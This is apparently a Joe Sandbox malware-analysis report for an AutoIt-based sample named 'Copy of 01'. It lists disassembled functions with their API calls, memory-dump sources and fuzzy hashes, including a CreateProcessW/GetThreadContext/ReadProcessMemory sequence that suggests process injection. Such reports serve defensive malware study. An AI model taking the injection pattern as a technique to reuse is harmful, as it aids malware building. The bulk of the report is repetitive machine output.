                        • Instruction Fuzzy Hash: 38E0863669021077D2321756BC0DF8B3A1CD786B71F154210F71DB50D146A0250143A8
                        Function 00341310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 003417F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: CALL
                        • API String ID: 1385522511-4196123274
                        • Opcode ID: 646a680cb55e0dd0e1043ca387f063dbbbc2a31655649ebb95bf4d4320f3c4ff
                        • Instruction ID: 0c4493dd2c02044e91d7adeffcaff305e385cc106de173f2bb794c109a3ffa45
                        • Opcode Fuzzy Hash: 646a680cb55e0dd0e1043ca387f063dbbbc2a31655649ebb95bf4d4320f3c4ff
                        • Instruction Fuzzy Hash: A12299706087019FC716DF24C485A2ABBF5BF86314F19896DF4968F3A2D771E981CB82
                        Function 003A6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 003A6F6B
                          • Part of subcall function 00334ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LibraryLoad_wcslen
                        • String ID: >>>AUTOIT SCRIPT<<<
                        • API String ID: 3312870042-2806939583
                        • Opcode ID: 2b17aa8d80edb27d99f13dd43837048872001f1c310f0de9e9967c318f28a54f
                        • Instruction ID: def1bafe95dff2ef6243fb6a76572b3ccf07bf886dbca26466bca3123bd4342d
                        • Opcode Fuzzy Hash: 2b17aa8d80edb27d99f13dd43837048872001f1c310f0de9e9967c318f28a54f
                        • Instruction Fuzzy Hash: B8B1A3711082019FCB16EF20C8D29AEB7E5FF95310F05895DF4969B262EB30ED49CB92
                        Function 003A2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID: EA06
                        • API String ID: 2638373210-3962188686
                        • Opcode ID: 55dc342fef1a00a0e62fcc508d4580008322d0a78f854d67f1db545de9ef8d0f
                        • Instruction ID: b4c9829d7f889ad8f2d758b4f110d4e2e0ee5193b592c363e6d19ccdc13cd873
                        • Opcode Fuzzy Hash: 55dc342fef1a00a0e62fcc508d4580008322d0a78f854d67f1db545de9ef8d0f
                        • Instruction Fuzzy Hash: EA01B572D042587EDF19C7A8C856EEEBBF8DB06301F00455AE552D6181E5B4E7088B60
                        Function 00333837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                        Download Yara Rule
                        APIs
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconNotifyShell_
                        • String ID:
                        • API String ID: 1144537725-0
                        • Opcode ID: 10dbe7ef84a8d9168d414283614b653f3df40091c74069bac049fac3ae0452cc
                        • Instruction ID: 3080656ad5565d2ac70d2338e629ff9f9e998a75302f362eafc4aaa90d3c813a
                        • Opcode Fuzzy Hash: 10dbe7ef84a8d9168d414283614b653f3df40091c74069bac049fac3ae0452cc
                        • Instruction Fuzzy Hash: 18319170504301DFE722DF24D9C4B97BBE8FB49709F00492EF99997290E771AA48CB92
                        Function 00336D9E Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0034CF58,?,?,?), ref: 00336DBA
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0034CF58,?,?,?), ref: 00336DED
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide
                        • String ID:
                        • API String ID: 626452242-0
                        • Opcode ID: 20b79263bdb642f368ed9c49c9e1f4d0cf432fd9cd6e651c1bc82ceba2255d98
                        • Instruction ID: 63f6c6433fee50e53f8a94a764140cd65b0cbb63e1924268ad784fd98146ece9
                        • Opcode Fuzzy Hash: 20b79263bdb642f368ed9c49c9e1f4d0cf432fd9cd6e651c1bc82ceba2255d98
                        • Instruction Fuzzy Hash: 9001F2723042007FEB2A5B6ADD8BF6F7AEDDB85300F04403DF106DA1E1E9A1AC008660
                        Function 0138129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01381A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01381AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01381B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction ID: ee76ead71c7e2ac9d3a0947c40ce74733375bd43551546ee512322f9b792ed32
                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                        • Instruction Fuzzy Hash: AB12CD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4F81CB5A
                        Function 00334ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00334E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                          • Part of subcall function 00334E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                          • Part of subcall function 00334E90: FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
                          • Part of subcall function 00334E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                          • Part of subcall function 00334E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                          • Part of subcall function 00334E59: FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Library$Load$AddressFreeProc
                        • String ID:
                        • API String ID: 2632591731-0
                        • Opcode ID: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                        • Instruction ID: 0635c3e311656b1488d22117a5f7a59262ce1c8608b7c0a4e73c05c02d53b189
                        • Opcode Fuzzy Hash: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                        • Instruction Fuzzy Hash: 5E112332610205AACF27AB64DC82FAD77A9AF40B11F14842DF442AE1C1EE74EE059B50
                        Function 00368402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __wsopen_s
                        • String ID:
                        • API String ID: 3347428461-0
                        • Opcode ID: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                        • Instruction ID: e03b1860b14c75a4dd8915eefb821daf6a789162ff952bc16afb23bb39350094
                        • Opcode Fuzzy Hash: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                        • Instruction Fuzzy Hash: B8115E7190410AAFCF06DF58E94099E7BF4EF48300F118159FC08AB311DB30DA11CB64
                        Function 00365000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00364C7D: RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                        • _free.LIBCMT ref: 0036506C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateHeap_free
                        • String ID:
                        • API String ID: 614378929-0
                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction ID: 0db2f4090693b0787ded5eb7a6b2c2d634521ed33134f84736b05a5367fc33ed
                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                        • Instruction Fuzzy Hash: 930149726047056BE3328F65D885A9AFBECFB89370F26452DF184872C0EB30A805C7B4
                        Function 0035E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction ID: b30988700cf2b9736134b6dfb1a057069fffd976fc13dbb9fb189879be87ecf1
                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                        • Instruction Fuzzy Hash: 43F0F432510A10AAC7373A69DC05F5B339D9F523B3F114B15FC219A1E2CB74D90A86E5
                        Function 00364C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                        • Instruction ID: 0bacec0b9821714b25b82f874425631add3d9bd6992bc2604906cf18900b6b46
                        • Opcode Fuzzy Hash: a88cfc0f677be518a73bd828da07ee03120c6642d1bd61346d32d494c03a6313
                        • Instruction Fuzzy Hash: D1F0E931E0222477DB235F669C09F5A379CBF81BA1B16C121FC19EA798CA70D80187E0
                        Function 00363820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                        • Instruction ID: 2cf55821c48fd11a81ab9eb50d58ca704f4469b6abf007a6ff389cc41ee8b237
                        • Opcode Fuzzy Hash: 93c5e6f9285ca844342356fd1a4173c9f6e337cfe358186be3af8497711e59cc
                        • Instruction Fuzzy Hash: EBE065311012245AE62326679D05FDA364DAF427B1F168121BC15979A5DB21DD0983E1
                        Function 00334F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(?,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334F6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                        • Instruction ID: 3f4a2224b770f5b943adbb0074c412cbd91a2cac95658aad71e4a650ae29a09d
                        • Opcode Fuzzy Hash: c4471c58597e669fee1842460365e7a33b68ba4aaa27d10fa1cf969b4436ab05
                        • Instruction Fuzzy Hash: D2F03071105751CFDB369F65D4D0C12B7E4EF1431971989BEE1DA82621C731B844DF10
                        Function 00332DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00332DC4
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LongNamePath_wcslen
                        • String ID:
                        • API String ID: 541455249-0
                        • Opcode ID: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
                        • Instruction ID: 6346e4f0b0c98929a1b22679263779550ec29980a0d1a42b1304a5e7413182d5
                        • Opcode Fuzzy Hash: ca38674f1d8a2d04944aede8e5f09eed088d141e927ad5754161c7458c11b5a1
                        • Instruction Fuzzy Hash: 24E0CD72A001245BCB2192589C06FDA77DDDFC8790F044171FD0DD7248D964AD808650
                        Function 003A2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __fread_nolock
                        • String ID:
                        • API String ID: 2638373210-0
                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction ID: 2cd68d873279b0e8104e08730d2c72de325377209425b602f3b4c4f233cec5a7
                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                        • Instruction Fuzzy Hash: 1AE048B06097005FDF3D5A28A9517B777E4DF4A301F01045EF59F86362E5726845864D
                        Function 00332B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00333837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
                          • Part of subcall function 0033D730: GetInputState.USER32 ref: 0033D807
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00332B6B
                          • Part of subcall function 003330F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0033314E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                        • String ID:
                        • API String ID: 3667716007-0
                        • Opcode ID: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
                        • Instruction ID: 85978609952f98b87d66c0b07f4000739faeb47cb577b449dc7e6a8b379fd551
                        • Opcode Fuzzy Hash: ebf094c63335a950eb551264556d6d8636939ec47ae1898c93b9d71f62c26463
                        • Instruction Fuzzy Hash: A9E08C3270424406CA0ABB74A8D29AEA7599BD1362F40957EF1469F1B3CF788A498352
                        Function 0037039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                        • Instruction ID: ac8a46d0addd19556b3628a25f6ae7668807543c71acdddecb0c9aa0ecd51c45
                        • Opcode Fuzzy Hash: 76a153f5ea98b277bcaec1a628ee2c61c9e0c8e6e4df84a773174413e4fe858e
                        • Instruction Fuzzy Hash: 03D06C3205010DBBDF028F85DD06EDA3BAAFB48714F014000FE1896020C732E821AB90
                        Function 00331CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00331CBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: InfoParametersSystem
                        • String ID:
                        • API String ID: 3098949447-0
                        • Opcode ID: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                        • Instruction ID: 33387f2f6a3ff370a05c65ba35ef2c45abeaaf9cacc42fb2f3380e888f03731d
                        • Opcode Fuzzy Hash: 4e1db591429ac0177464341e0682fafdb1f29eedd06c6486a474855f945b947f
                        • Instruction Fuzzy Hash: 39C09236280304AFF3159B80BE4EF107768A348B00F049011FA0EB95F3C3F22821EB58
                        Function 0034FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
